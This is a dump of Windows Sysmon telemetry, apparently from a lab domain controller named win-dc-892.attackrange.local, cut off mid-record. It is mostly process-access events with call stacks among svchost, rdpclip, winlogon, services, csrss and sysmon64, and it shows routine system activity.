12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.996{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE8A3350FF98FB203519CEC3AE857D8,SHA256=785FF3C1B4C8E837F4255D22E427E7FB94F407C99608DE2734CF0455E6DEB005,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.996{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.996{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.973{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.957{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4